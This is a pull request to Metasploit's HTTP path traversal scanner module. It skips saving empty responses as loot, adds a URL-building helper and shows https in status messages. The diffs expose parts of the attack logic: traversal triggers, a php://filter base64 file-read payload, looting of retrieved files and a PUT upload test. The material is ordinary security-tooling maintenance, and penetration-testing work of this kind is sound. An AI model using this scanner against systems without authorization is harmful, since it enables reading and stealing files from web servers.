### PR TITLE
Skipping empty files for path traversal enumeration inside http_traversal.rb

### DIFF
--- a/modules/auxiliary/scanner/http/http_traversal.rb
+++ b/modules/auxiliary/scanner/http/http_traversal.rb
@@ -243,7 +243,7 @@ class MetasploitModule < Msf::Auxiliary
       if not res or res.body.empty?
         next
       end
-      
+
       vprint_status("#{res.code.to_s} for http://#{rhost}:#{rport}#{uri}")
 
       # Only download files that are within our interest
@@ -274,7 +274,7 @@ class MetasploitModule < Msf::Auxiliary
       if not res or res.body.empty?
         next
       end
-      
+
       vprint_status("#{res.code.to_s} for http://#{rhost}:#{rport}#{uri}")
 
       # We assume the string followed by the last '/' is our file name

--- a/modules/auxiliary/scanner/http/http_traversal.rb
+++ b/modules/auxiliary/scanner/http/http_traversal.rb
@@ -240,10 +240,14 @@ class MetasploitModule < Msf::Auxiliary
       req = ini_request(uri = (normalize_uri(datastore['PATH']) + trigger + f).chop)
       res = send_request_cgi(req, 25)
 
-      vprint_status("#{res.code.to_s} for http://#{rhost}:#{rport}#{uri}") if res
+      if not res or res.body.empty?
+        next
+      end
+      
+      vprint_status("#{res.code.to_s} for http://#{rhost}:#{rport}#{uri}")
 
       # Only download files that are within our interest
-      if res and res.to_s =~ datastore['PATTERN']
+      if res.to_s =~ datastore['PATTERN']
         # We assume the string followed by the last '/' is our file name
         fname = f.split("/")[-1].chop
         loot = store_loot("lfi.data","text/plain",rhost, res.body,fname)
@@ -267,7 +271,11 @@ class MetasploitModule < Msf::Auxiliary
       req = ini_request(uri = (normalize_uri(datastore['PATH']) + "php://filter/read=convert.base64-encode/resource=" + f).chop)
       res = send_request_cgi(req, 25)
 
-      vprint_status("#{res.code.to_s} for http://#{rhost}:#{rport}#{uri}") if res
+      if not res or res.body.empty?
+        next
+      end
+      
+      vprint_status("#{res.code.to_s} for http://#{rhost}:#{rport}#{uri}")
 
       # We assume the string followed by the last '/' is our file name
       fname = f.split("/")[-1].chop

--- a/modules/auxiliary/scanner/http/http_traversal.rb
+++ b/modules/auxiliary/scanner/http/http_traversal.rb
@@ -240,9 +240,7 @@ class MetasploitModule < Msf::Auxiliary
       req = ini_request(uri = (normalize_uri(datastore['PATH']) + trigger + f).chop)
       res = send_request_cgi(req, 25)
 
-      if not res or res.body.empty?
-        next
-      end
+      next if not res or res.body.empty?
 
       vprint_status("#{res.code.to_s} for http://#{rhost}:#{rport}#{uri}")
 
@@ -271,9 +269,7 @@ class MetasploitModule < Msf::Auxiliary
       req = ini_request(uri = (normalize_uri(datastore['PATH']) + "php://filter/read=convert.base64-encode/resource=" + f).chop)
       res = send_request_cgi(req, 25)
 
-      if not res or res.body.empty?
-        next
-      end
+      next if not res or res.body.empty?
 
       vprint_status("#{res.code.to_s} for http://#{rhost}:#{rport}#{uri}")
 

--- a/modules/auxiliary/scanner/http/http_traversal.rb
+++ b/modules/auxiliary/scanner/http/http_traversal.rb
@@ -86,6 +86,12 @@ class MetasploitModule < Msf::Auxiliary
     @data || datastore['DATA']
   end
 
+  #
+  # Constructs an URL from the current context and a provided URI
+  #
+  def build_url(uri)
+    "http#{datastore['SSL'] ? 's' : ''}://#{rhost}:#{rport}#{uri}"
+  end
 
   #
   # The fuzz() function serves as the engine for the module.  It can intelligently mutate
@@ -115,7 +121,7 @@ class MetasploitModule < Msf::Auxiliary
           trigger = base * d
           p = normalize_uri(datastore['PATH']) + trigger + f
           req = ini_request(p)
-          vprint_status("Trying: http#{datastore['SSL'] ? 's' : ''}://#{rhost}:#{rport}#{p}")
+          vprint_status("Trying: #{build_url(p)}")
           res = send_request_cgi(req, 25)
           return trigger if res and res.to_s =~ datastore['PATTERN']
         end
@@ -200,7 +206,7 @@ class MetasploitModule < Msf::Auxiliary
 
       uri = normalize_uri(datastore['PATH']) + trigger + datastore['FILE']
       req = ini_request(uri)
-      vprint_status("Trying: http#{datastore['SSL'] ? 's' : ''}://#{rhost}:#{rport}#{uri}")
+      vprint_status("Trying: #{build_url(uri)}")
       res = send_request_cgi(req, 25)
       found = true if res and res.to_s =~ datastore['PATTERN']
     end
@@ -242,7 +248,7 @@ class MetasploitModule < Msf::Auxiliary
 
       next if not res or res.body.empty?
 
-      vprint_status("#{res.code.to_s} for http#{datastore['SSL'] ? 's' : ''}://#{rhost}:#{rport}#{uri}")
+      vprint_status("#{res.code.to_s} for #{build_url(uri)}")
 
       # Only download files that are within our interest
       if res.to_s =~ datastore['PATTERN']
@@ -271,7 +277,7 @@ class MetasploitModule < Msf::Auxiliary
 
       next if not res or res.body.empty?
 
-      vprint_status("#{res.code.to_s} for http#{datastore['SSL'] ? 's' : ''}://#{rhost}:#{rport}#{uri}")
+      vprint_status("#{res.code.to_s} for #{build_url(uri)}")
 
       # We assume the string followed by the last '/' is our file name
       fname = f.split("/")[-1].chop
@@ -302,7 +308,7 @@ class MetasploitModule < Msf::Auxiliary
     # Form the PUT request
     fname = Rex::Text.rand_text_alpha(rand(5) + 5) + '.txt'
     uri = normalize_uri(datastore['PATH']) + trigger + fname
-    vprint_status("Attempt to upload to: http#{datastore['SSL'] ? 's' : ''}://#{rhost}:#{rport}#{uri}")
+    vprint_status("Attempt to upload to: #{build_url(uri)}")
     req = ini_request(uri)
 
     # Upload our unique string, don't care much about the response

--- a/modules/auxiliary/scanner/http/http_traversal.rb
+++ b/modules/auxiliary/scanner/http/http_traversal.rb
@@ -115,7 +115,7 @@ class MetasploitModule < Msf::Auxiliary
           trigger = base * d
           p = normalize_uri(datastore['PATH']) + trigger + f
           req = ini_request(p)
-          vprint_status("Trying: http://#{rhost}:#{rport}#{p}")
+          vprint_status("Trying: http#{datastore['SSL'] ? 's' : ''}://#{rhost}:#{rport}#{p}")
           res = send_request_cgi(req, 25)
           return trigger if res and res.to_s =~ datastore['PATTERN']
         end
@@ -200,7 +200,7 @@ class MetasploitModule < Msf::Auxiliary
 
       uri = normalize_uri(datastore['PATH']) + trigger + datastore['FILE']
       req = ini_request(uri)
-      vprint_status("Trying: http://#{rhost}:#{rport}#{uri}")
+      vprint_status("Trying: http#{datastore['SSL'] ? 's' : ''}://#{rhost}:#{rport}#{uri}")
       res = send_request_cgi(req, 25)
       found = true if res and res.to_s =~ datastore['PATTERN']
     end
@@ -242,7 +242,7 @@ class MetasploitModule < Msf::Auxiliary
 
       next if not res or res.body.empty?
 
-      vprint_status("#{res.code.to_s} for http://#{rhost}:#{rport}#{uri}")
+      vprint_status("#{res.code.to_s} for http#{datastore['SSL'] ? 's' : ''}://#{rhost}:#{rport}#{uri}")
 
       # Only download files that are within our interest
       if res.to_s =~ datastore['PATTERN']
@@ -271,7 +271,7 @@ class MetasploitModule < Msf::Auxiliary
 
       next if not res or res.body.empty?
 
-      vprint_status("#{res.code.to_s} for http://#{rhost}:#{rport}#{uri}")
+      vprint_status("#{res.code.to_s} for http#{datastore['SSL'] ? 's' : ''}://#{rhost}:#{rport}#{uri}")
 
       # We assume the string followed by the last '/' is our file name
       fname = f.split("/")[-1].chop
@@ -302,7 +302,7 @@ class MetasploitModule < Msf::Auxiliary
     # Form the PUT request
     fname = Rex::Text.rand_text_alpha(rand(5) + 5) + '.txt'
     uri = normalize_uri(datastore['PATH']) + trigger + fname
-    vprint_status("Attempt to upload to: http://#{rhost}:#{rport}#{uri}")
+    vprint_status("Attempt to upload to: http#{datastore['SSL'] ? 's' : ''}://#{rhost}:#{rport}#{uri}")
     req = ini_request(uri)
 
     # Upload our unique string, don't care much about the response


### PR DESCRIPTION
I recently used this module in a CTF and I noticed it was downloading every file it tried to, even when the request would 404, this would lead to an extremely massive file list with no content. This patch intends to prevent the looting of empty files, considerably improving the usability of the scanner.
